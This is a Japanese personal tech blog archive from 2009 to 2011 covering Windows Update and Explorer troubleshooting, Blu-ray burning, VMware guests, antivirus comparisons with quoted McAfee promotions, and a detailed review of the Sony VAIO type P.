でも普段1000円キーボードを使っている私には高価。しかしいいなぁこれ(笑)。
最近は3TBのHDDも出まわってますね、14000円とか。1プラッタに1テラバイト集積してるのか。
おかげで?2TBも安くなってきてますね。
FILCO Majestouch BLACK

...にしても、いいなぁこのキーボード(再掲)

| | コメント (0)

2011.01.03

Windows、秋葉原買物、ブルーレイ書込とか雑記

■win2003R2でMicrosoft Update 0xC80003FB エラー

去年2010.12.28までは使えていたのに、2011.1.2にエラー、
ログを見るとアップデート情報DBの読み込み失敗だと言っている。検索すると、
エラー番号 0xC8000643 - Diary::Weblog
2009.4.24日記『Microsoft Update が 0xC80003FB で失敗』
C:\windows\SoftwareDistribution\DataStore のDBが壊れてるからSoftwareDistributionフォルダごと改名か削除してupdateに再構築させればいいみたい。
削除して再構築はしたけどエラー、windows-updateにグレードダウンしても改善せず。
しかし、自動更新が無効になっていたのを有効にしたら直った?
会社のPCなので裏で勝手に外部通信してほしくないので無効にしてたが有効だと調子がいい?うーむ。
Microsoft Update 0xC80003FBMicrosoft Update 0xC80003FB

■windows7のフォルダ設定「新しいウインドウを作らない」が効かない、

クリックの度にたくさんウインドウが開いていく現象が治らない。
フォルダオプション「新しいフォルダを作らない」なのにファイルエクスプローラで新規にウインドウが開いてしまう。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1425667589
IE8が関係してるとの噂、レジストリで回避できるらしい。が、レジストリでdllを設定リセットするとかの技もやってみたが改善せず。
左ペインのフォルダをクリックすると新しいウインドウで開いてしまい、右ペインの中のクリックだと新しいウインドウを作らない。
左ペインでもカーソルキーでのフォーカス&リターンでも作らない。
http://oshiete.goo.ne.jp/qa/831998.html
windows7向けの情報が無いなあ。


■ファイルエクスプローラの右上の検索窓が無い

プログラム追加と削除・機能の有効化で「Windows search」を組み込めば復活。
高速検索不要なのでHDD内をindex化したくないので外したら検索自体ができんようになるとは。


■安物BD-Rに書き込み失敗するBH10NS30

LGエレクトロニクスのOEMのブルーレイ書き込みドライブ、10倍速対応、二層にも対応済みで読み込み50GBはできる、書き込みはできるのか??公式スペックではDL系の速度は未記載だがメディアには対応という表現?
表にダブルとか書いてないので二層への対応の仕方がわかりにくい。
で、このドライブは、秋葉原でよく見かけるVENUSというブランドの安いディスク(4倍速)で焼きエラーになる。CD-Rの黎明期のような媒体相性がブルーレイでも起きるとは。
SONY媒体(x4倍速)だと成功するので媒体依存のようだが、なんでまた...
どうやらファームをアップするといいのだが、LG公式では「07」配布で、バッファローが「09」をだしてるので、09にすれば使えるようだ。
http://bbs.kakaku.com/bbs/K0000070346/#12288803
バッファロー向け提供ファームだけどね。

去年秋で二層4倍が一枚350円、冬で二層6倍が556円、一層はVenusが100円で安かったけど最近はブランド物も一枚150円単価まで下がってきているので、無理してアヤシイのを使わなくていいか...
ブランド媒体は秋葉原ではファーストメディアショップが安いのでよく行きます。でも非会員。会員になろうと思ってももう来ないかな...と思ってしまって。
Venusはそんじょそこらのパーツ屋で売ってますが、他ドライブだと問題出てないので売れてるのかな。
ソニーのBD-DLはamazonで買いました。家電量販店のSDカードや円盤媒体は高いよね。
ブルーレイ書き込みブルーレイ書き込み

■無線と電子レンジ

数メートル離れていても無線がぶっつりと切れるとは。日立のレンジが強力なのか、Buffalo(バッファローWZR-HP-G301NH/E)が貧弱なのか?
通信途絶回避メモ

■ATOKとgoogleIME

タダなのでgoogle日本語入力使ってます(GoogleJapaneseInput-1.0.556.0←「ばーじょん」で変換)、
12月の自動バージョンアップで配色がおかしくなった不具合がありましたが治ったみたい。
ATOKの今度の新機能で地名変換が向上したと言ってますが、それらは既に全部googleは変換出来てる、アニメやタレントの固有名詞にも強いですから著名な地名も対応済みか。


■2TB-HDD

去年のインパクトは2TBが9000円台とか安く買えるようになったこと。
思わず私もツクモで買ってしまいました。秋には3TBまで登場したようですがこちらはまだまだ。
見た目は同じ大きさなのによくまぁ詰め込んだものだ。
安い2TBは回転数を遅くすることで高密度R/Wエラー率を下げているという話ですが、遅いほうが発熱も小さいしいいかな?と自分に言い聞かせる。
でも6GB転送マザーに高速HDDも繋いでみたいところ。


■winsxsの肥大化の秘密?

Vistaや7でファイル容量がでかくて気になるのですが、XPやDOS時代のようにシステムフォルダはうかつに削除すると動作不良になるので触れない...
WindowsUpdateでのインストール記録結果フォルダが¥windows直下に大量にできるので、XPだと気楽に削除しているのですが。
それをいいことに?winSXSというフォルダがでかくなってます。
これを削除していいのか?結論では削除しないほうがいいようです。
Windows7、HDDバカ食いの理由
しかし上記のように、見た目のサイズであり実際には場所を食っていないらしい。
デモキニナル...


■電源タップ

一番いいのを頼む...と言われて口がたくさんあるタップを探したら、バッファローから10個口のが。
あまり出回ってなくて、アキバでも去年にソフマップで買いました。
タコ足配線良くないですが部屋のコンセントはタップ無いと足りませんよね。

|

2010.12.18

RHEL6とubuntuと相性がいいVMware仮想化

Red Hat Enterprise Linux 6(RHEL 6)がリリースされました。
私の会社のパソコンでは、WindowsXPが自機で、これで順調に動いているし会社内の各システムがvistaや7に未対応なので新OS禁止なのでXPで満足して使ってます。
しかし新しいOSを研究したいので、VMwareでXP上で上位のOS達を動かしてます。

■RHEL6はよくなったもんだ
RHEL5のサブスクリプションがあるので、6のイメージも入手できるんですが、相変わらずLinuxの中ではCD枚数が多いのでDVDのisoでないと面倒くさい。
これをVMwareでインストールするんですが、なんか5のときよりも相性がいい。
つまり起動と終了時の各種ステップでエラーなにも出ない!VMware-workstation6で古いので、RHEL6のほうが仮想ソフトに最適化してんだろうか?てなくらい。
それにデスクトップも綺麗というか壁紙もおしゃれなのが多いね。
唯一の欠点は、VMwareTOOLSがインストールできない。
VMwareが古いので、RHEL5のモードで騙して6をインストールするんだけど、TOOLSのコンパイルの段階でヘッダが見つからないとか言う。path構成が変わっているようだ。
そのせいで、/mntのホストOSとのファイル共有ができなくなるが、REDHAT本来のネットワーク機能でWindowsネットワークを検知するから、ホストOS(私のXP)とはそれでファイル交換はできる。
本当は、D&Dでファイルを持っていければ便利なんだけど>TOOLSが正常に機能してれば
あ、VMネットはNATモードを愛用してます。会社からはひとつのIPしか今はもらえてないので。

■ubuntuもVM向け
こっちは無償でVM向けのイメージを配布しているので一層導入がラク。
RHELと画面はそっくりなんだけど、ソフトウェアアップデート、REDHATはファイルサイズ順にソートし直しができるんだけど(それででかすぎるサイズを探して後回しにする)、ubuntuはアルファベット順固定。
それにアップデートすると、なんかの拍子で起動しなくなる。3、4回は再インストールした。
アップすべきファイルが何百個もヒットするが全部やろうとすると、どっかでおかしくなる。
「新しいバージョンがあります(10.04.1 LTS)」とも表示されるが、そっちを選ぶとハングアップの確率がもっと上がる。
(配布しているVMデータでのバージョンは8.04)
VM上で大改装するとイマイチうまく動かない>私の環境の場合
公式サイトに最新版のVMデータがアップされるまで待ったほうがいいかも。

■WINDOWS2003も相性いい
イメージからVMインストールの素直さではwin2003もいいですね。もとがシンプルなのでインストールも速い。
RHEL6が一番時間かかるがそれでも20~30分だけど。
XPの窓の中で2003という兄貴分が動くのも変な感じ。
2003のWidowsUpdateがActiveXっぽいエラーで画面が先に進めない問題がありましたが、
デフォルトでIE6なのでIE8にしたら機能するようになった。
2008のほうはまだ試してません。VM6で動くのかな...

VMwareおもしろいですね。
今時はVMplayerが無料なのでそれで試すこともできる。
予算の都合でVMの最新を手に入れてないのが残念。
RHEL6とVMware RHEL6とVMware

|

2009.12.29

無料Microsoft Security Essentialsとマカフィー50%OFF

(2009.12.29)
■マカフィー半額

去年にマカフィーの半額につられて買いましたが、さすがにインターフェースの悪さ(操作したい項目がまとまってないので探しにくい)や変なツール(勝手にデフラグとかスケジュールしやがる)で、多機能なんだけど欲しい機能で無いばかりなので期限が切れてやめました。
するとまたメールが来るように。
今度もまた半額で

【50%OFF】▼▽スペシャル特典の詳細ページはこちら▽▼【期間限定】
http://www.storemcafee.jp/mcfs/link/tri/2009/1229/00
特別販売キャンペーン対象製品─────────────────┐
     マカフィー・インターネットセキュリティ 2010
         15ヶ月版 特別優待 3ユーザ
また3ユーザ版なので、本製品1本のご購入でパソコン3台までご利用可能!
そのため、ご家族で複数台数のパソコンをご利用されていても、低コスト
で安心のプロテクションを実現します!
【スペシャル特典(1)】とにかく安い!限定販売だからこそできる特別価格!
オンライン標準価格 5,775円(税込)のところ………
本メールからご注文いただいた方には、なんと ≪ 50%OFF ≫ の
★°・。☆°・。★°・。【 2,887円(税込)】°・。★°・。☆°・。★

12/28までだったの無視していたら今日のメールで1/11まで延長だそうな。
有名どころ他社は半額にはしないから15か月で安くはある。
しかし…

■無料!Microsoft Security Essentials
 http://www.microsoft.com/security_essentials/default.aspx

今年はマイクロソフトから無料でウイルス対策ソフトが出てしまった。
とりあえずインストールするとか、ウイルス対策に詳しくない人から相談受けてしかもお金かけたくないと言われた時にベストチョイスでしょう。
マイクロソフトの威信で作っているから最高でなくても結構いい性能だと思うし。
それに私の経験ではウイルスには遭遇しないので、最強のウイルス検知は必要ないと思っている。
車が欲しいからと皆は高級車に乗っていないわけで。
それで入れてみたけど、
良い点
・FW機能は無し。OS標準機能にゆだねて分担。余計なモジュールが無くてシンプル
・インストールは早い。サイズ小さい
・処理も軽い。今どきの性能パソコンならストレス感じないでしょう
・機能設定は、スキャン対象の種類やフォルダの指定、アーカイブやリムーバブル見る見ない、定時スキャンとそこそこカスタマイズできる
・パタンファイルは更新スケジュールは自動。当然手動今すぐ更新も可
・アプリ監視はちゃんとしてる。ftpしようとしたら許可を求めてきた(著名&自社アプリは無条件で通信をとおしているようだ)
気になる点
・他社おまけ機能(ネットアドバイザーや広告カットやOSクリーナー)は無い。むしろシンプルでいいか
・ログが淡泊。自動スキャンした履歴も記録せんのか...

ごちゃごちゃせずに純粋にプロテクトだけしてくれ!な人にもいいかも。
半額どころか無料なんだからこれはいいなぁ。
google日本語入力のように人気出るかな。
20091229


(2008.08)
Vistaのアンチウイルスソフト、無料体験版をハシゴして検討中なのですが
1社が30日間でも各社回ると1年は持ちそうなくらい体験版が多いです。
マイクロソフトやカスペルスキーのように30日間以上提供したり、
マカフィーのように1製品種別ごとに30日間OKだったり。
しかし私のパソコンが余計なレジストリやファイルでカオスになるので
そろそろ選ばないといけないのですが、8月になってマカフィーから気になるメール。

見逃せない!衝撃の11日間!≪ 50%OFF特別販売のお知らせ ≫
ご注文いただいたお客様へのスペシャル特典として、11日間の期間限定で
対象製品を ≪≪ 50%OFF! ≫≫ とした特別販売を実施しております!
またマカフィー製品以外の他社ソフトをご利用していて、内容に満足
されていないお客様もぜひこの機会に乗り換えをご検討ください!
特別販売キャンペーン対象製品
◇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◆
マカフィー・インターネットセキュリティスイート
with サイトアドバイザ 15ヶ月版 3ユーザ
◆━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━◇
オンライン標準価格 5,775円(税込)のところ………
本メールからご注文いただいたお客様には、なんと << 50%OFF >> の
■==================>【 2,887円(税込) 】<=================■
にて2008年8月25日(月)まで、期間限定でのご提供となります!
さらにご契約期間も、通常 12ヶ月間のところ
今回の対象製品では、特別 15ヶ月間もご利用できますので
<<<<< 3ヶ月間分が無料! >>>>> となり、たいへんお得です!
この機会にぜひご購入ください!

これはかなり安い。
マカフィーは体験版を申し込み、そこから正式にユーザーになると通常料金で15ヶ月有効(3ヶ月延長)な製品が買える特典があります。
これだけでも店頭で買うよりちょっといいわけですが、半額かぁ。
ノートン2009のベータテスター募集も気になりますが買うなら今はこれがお買い得でしょう。
しかしマカフィー・インターネットセキュリティスイートを入れるとVistaのCompletePCバックアップが機能しなくなる現象があったので要検証。
下位のウイルススキャンプラスでは起きなかった。マカフィー側のバックアップ機能を止めればよさそう?
なお、この半額や+3ヶ月のキャンペーンはe-mailで紐付けて顧客管理してるらしく複数回買わせないように対策してるらしい。

|

2009.06.22

VAIO type Pの最上位を買ったレポ

(2009.7)
厚さ800μメートル・最薄ヒートパイプがVAIO type Pに 古河電工が開発 - ITmedia News
http://www.itmedia.co.jp/news/articles/0907/02/news011.html
パイプが細いほど熱が送れないところを薄いのに伝達できるという。
PはSSDだとファンとか動作音がしないのがクールですが、薄くてもちゃんと放熱対策してあるのですね。
ちなみに「放熱ボタン」がフロントにあるのですが、これを押すと放熱処理を優先的にやってくれるらしいのですが、
オンオフでの差がわかりませんでした??
どういう効果のボタンなんだろう。
背面もスリットがない天板なのでエアフローで廃熱できないところを、そういうヒートパイプで本体表面まで引っ張り出しているようです。


(2009.6)
先日にUMPCってことでソニーのをtype P買いました。型番VGN-P91
スペックが高くてFOMA通信カードが内蔵で3万円キャッシュバックやっているので。
VISTA+周辺機器いろいろ入りでsonystyleでオーダーメイドで12万円もしました。
先週2009/6/12頃から「WAN搭載で1万円引き」も始めてさらに安くなってる。…なんてことだ。
店頭モデルや安いモデルではスペックが低くあとで増強できない。
XP版はメモリが1Gしか無いのでVISTA買うしかない、大は小を兼ねるので、BASICでなくPremiumなVISTAにしました。


■古いVAIOの引き取りを試みるも

PCリサイクル法で3000円払わないといけないのをソニーは買い取りをしてる。
手持ちのVAIO『PCG-F34』を売ろうとしたら「買取不可」でした…。
なんたってwindows98ですからね。
しようがないのでソニーサポートに3000円で引き取りを申し込みました。
ゆうパックで送るらしいがコンビニでは受け付けてくれないらしい。不便だな。
ゆうパック着払のラベルが郵送されてきましたが、通常と全く伝票書式違う白色ラベル。
説明書では「全部記入済みなので貼るだけ」でしたが、案の定郵便局に持ち込むと、どう処理していいか局長交えての議論になって待たされる…。
ゆうパック独占配送事業なんだから制度開始時に周知なかったの?着払いだし宛先書いてあるし重量関係ないし、なにも事務手間なかろうに。
それだけPCリサイクルが何年もされてなくて私がご近所で第一号だったのだろうか…
結局(3枚綴り伝票から)控え半券をもらって終わり。


■本体外見印象

ネット通販ではメッシュカラーを選べますが、通常カラーは光沢。なので指紋が目立ちやすい。
一応(ちゃちい)クロスが付属してるのでフキフキできます。
typePは、裏面も光沢板一枚でスッキリしてます。ネジとか通気口でごちゃっとしてないのがスマート。
キーボードは、かな刻印無しも選べるのですがそっちが5000円高い。スマートなほうがお値段高いのか。
VAIO type P


■付属品

よくわからないまま「ウォールマウントプラグアダプター」も一緒に買う。
これはACアダプタ本体箱に付けて本体箱ごとコンセントに付けるようだ。名前の通り壁にくっつける。
これでケーブルの途中に箱がぷらぷらするのを防ぐらしい。
長さも半分になっちゃうがスッキリ配線の人にいいかも。
「ディスプレイ/LANアダプター」は、両方の接続端子が増設できる。
部屋内は有線LANでつないで、vaioのワイヤレスWANでインターネットに繋ぎたかったのでアダプターを購入。
これらは本体と一緒に買うと安いのでそうしました。
謎なのは、ACアダプタの箱部分(かなりコンパクトでいいですね)とLANアダプターもジョイントできること。配線的に意味がないようで、持ち運びのためかなあ?
ACアダプターの先端はL字型だけでなく、通電してると発光してるので便利ですね。
VAIO type P


■WANとFOMA

今回の目的は、FOMAデータ通信をすること。
定価が1万円、データ割で月6700円ですが、バリューで700円位さらに安くできるし、パケホーダイのPC通信は12000円もするのでデータ通信用に1回線増やすほうがいいと判断<オイオイ
VAIOを購入して専用のURLをクリックして申し込み。
「バリューには申し込むな」との説明が謎でしたが、バリュープランにできるかどうかは機種で決まるので内蔵通信モジュールがバリュー対応でないということ?
6月26日開始のHSUPA上り5.7MbpsのUSB接続型データ通信端末「L-05A」はバリューOKだとニュースリリースで明記あったが。

申込説明書では「本人確認コピーを郵送であとで送れ」ともあるがこれはFOMAカードを通話とか別プランに変えるために必要であって、データ通信プラン申込自体はクレジットカードだけで成約OKだった。
てっきりコピー郵送後でないとカード送ってこないと思っていたら、申込の翌日にカードが発送、その次の日にもう書留で届きました。私は書類出してないのに。
FOMAカードは白色のAX03でした。AXだからジェムアルト(旧アクサルト)社のSIMですね。

プロバイダーはniftyではFOMAデータ通信やってないので、OCNに新たに加入。月800円のモバイルプラン。
通信カードをレンタルとか購入するなら、内蔵で12万円に含まれているなら安いかなあ。
VAIO type P


■GPSと無線LANとBlueTooth

カメラは搭載しませんでしたが、WANにGPSと無線LANとBlueToothを載せてます。詰め込みすぎ(笑)
GPSは携帯と違ってたくさんの衛星と測位して正確に出しますが、最初の測定に時間がかかるような?>携帯より
こうしたワイヤレスはスライドスイッチでハード的にON/OFFできて便利。デスクトップにステイタスアイコンがあって稼働状況確認と変更ができる。
イーモバ&UMPCで電車パソコンやってる人を見かけましたが、やはり通信モジュールが出っ張ってない事前内蔵型機種がスマートでいいです。


■処理性能
スペック&性能レビューは私の実感でも以下のサイトが良いと思いました。

真の実力が明らかに:これは理想の低価格ミニノートPCなのか!?「VAIO type P」徹底検証
『ITmedia +D PC USER』
http://plusd.itmedia.co.jp/pcuser/articles/0901/15/news017.html

Atom Z550(2GHz)を搭載したVAIO typePのパフォーマンスをチェックする
『ソニーが基本的に好き。』
http://kunkoku.livedoor.biz/archives/51675127.html

私のは、ATOM Z550 2GHz 2Gメモリ 60G-SSD で一番ハイスペックのを選んだのですが、
それでもVISTAのAEROは重い! 重くて画面切り替え時にブラックアウトして再描画にワンテンポ時間がかかるし、OSが「重いのでレベルを下げませんか?」と警告まで出してくる。
半透明をやめたり16bitにしたりクラシックVisualStyleにするとまとも速度になる。
きっとXPにダウングレードすればもっと快適なんでしょう。
戸田覚さんレビューでもそうおっしゃってますし。
http://pc.nikkeibp.co.jp/article/trend/20090525/1015481/

VISTA Premiumで買ったのですが、AEROは使い物にならんですね。
Z550なので、下位CPUのノートってもっと動作が遅いのだろう。
私は携帯電話やザウルスの速度に慣れているので、このVISTAは重いですね。
しかもSONY付属のアプリが大量にあって、常駐サービスもいっぱい。これらも重い原因。
sonicstageVのドライブ接続待ち監視とか、ハンディカム連携監視とか要らない…
上のスクリーンショットに「プログラムと機能」画面でプリインストールの様子が見えますが、あれでも半分は削ったあと。
VISTAのOSベンチマークでは「3.0」、それはゲーム用グラフィックのせいで、CPUが3.5、グラフィック5.9、HDD5.7で他は結構いい性能。
intelGMA500は非力なアクセラですが、記事にあるように「動画再生支援」があり、mp4とかH.264の再生ではCPUがmp3再生と同じぐらいの稼働率なのはすごい。それでも30%以上は使用するのでデスクトップよりはCPUは非力ですね。
ニコニコ動画やYOUTUBEのようなFLASH内再生では支援は効果薄いようだ。

起動は私のデスクトップより速い。BIOS画面の時間がほとんどないから。
しかしデスクトップが表示されて使えるようになるまでが20秒は待つ。
その間はCPU100%で無理に操作してもまともに動かない。
SSDじゃないともっと遅いのだろうなあ。
これも常駐ものをカットしまくれば緩和できますが余裕のなさは小型の宿命か。

バッテリーの持ちは、高め輝度でワイヤレスものを全部アクティブで運用するという厳しい条件で2時間でしょうか。
スリープだとすぐに復帰できますが、休止だと状態保存と読み出しで30秒は待たないと。
しかもGPSとか稼働中に休止すると復帰時にGPSがときどき認識されず、地図ソフトがエラーを言ってくる。まぁ仕方ないとはいえ休止からの復帰は完ぺきにはいかないようだ。
とはいえスリープだと裏でVISTAが稼働してるのでインスタントモードが呼び出せない。

キートップがプラじゃなくて金属な感触。そのため熱で温かい。これは裏とキーボード両面で放熱するためのようだ。
atomと言えども、WindowsUPDATEでサービスパック適用とかCPU100%が長く続くと膝には置けないくらい熱くなります。


■インスタントモード

VISTAを休止またはシャットダウンすると、インスタントモードが起動できます。
専用ボタンを押すとLinuxかどっかのベースのOSで起動します。見た目はPSPのクロスメディアバーと一緒。同じシステムなのかな?
同じなのでブラウザ(FireFOX)ではオプション設定もあまりいじれないが、動作が軽い!
音楽動画、ネットやるにはインスタントモードがいいでしょう。ブラウザは2画面まで開ける。
音楽や動画は、VISTAのパブリックフォルダと連動していて、あらかじめそこにファイルを置いておく。
クロスメディアバー機能はvistaでも同じソフトがあるのですが、それだとmp3再生でもぎこちなくなる重さなのでインスタントのほうがいい。
まぁ、ぎこちなかった原因は、サウンドのプロパティでHD品質に設定していたので負担が大きかったためです。
でもアルバムアートワークが汚く画質劣化しての表示なのでインスタントのほうがいいなあ。


■TVCMとか

ポケットに押し込むには無理ありますが、まぁ片手で持てる小ささはさすがです。
これで1600*768ドットで私の1280幅より広いのですから。
高精細液晶なので小さくても読める。解像度は変えられます。
600*800とかにできるし、画面いっぱいに広げるとか指定できるので、小さいのがいやなら低解像度でフルスクリーンにするといい。
↓ JR池袋駅構内の柱にはPの広告が
VAIO type P


■キャッシュバックキャンペーンとか早い手続き

注文して発送まで5~6日間でした。
FOMAデータ通信を専用サイトで申し込むと翌日にはFOMAカードを送ってくれました。
カードを開通させたら、二日して現金書留で3万円を発送してくれました。
この手のものは手続き遅いと思っていたらなんかすごく速い…ソニーやるじゃん。
FOMAカード到着時に「ファミリー割引申込書」が同封されてますが、これに自力で記入するには難しい。主回線や副回線や各回線所有者の同意書とか支払とか複雑なので。
説明書には「申込書の返送かdocomoインフォメーションセンター151に電話を」とあるが、近所のドコモショップでファミ割の申し込みをしました。
音声4回線+データ通信のファミリーですが、家族にソフバン居るのでまだ家族全員参加になってない。


■SonyIDとVAIOオーナー

ソニーIDとは別に、VAIO会員というのがあって、そこに加入するには
VAIOからネット接続すること。ブラウザのActiveXかなんかで機種を調査するので
普通のPCからは加入できない…。
vaio updateというwinupdateもどきもあって、便利というべきか、OSを重くしてると言うか…


■まとめ
ATOM Z550+2Gメモリ+SSD、やはりハードのスペックは少しでも高くないと動作ストレスあり。
表示グレードを落とすとまともに動作します。
インスタントモードは最初から軽くて快適。
Z550搭載してるって点でtypePがベストバイじゃないでしょうか。
12万円もかかりますが、今なら3万+1万の値引きあり。
ただしその値引きのためにはFOMA加入が必要ですがー。

| | トラックバック (0)

より以前の記事一覧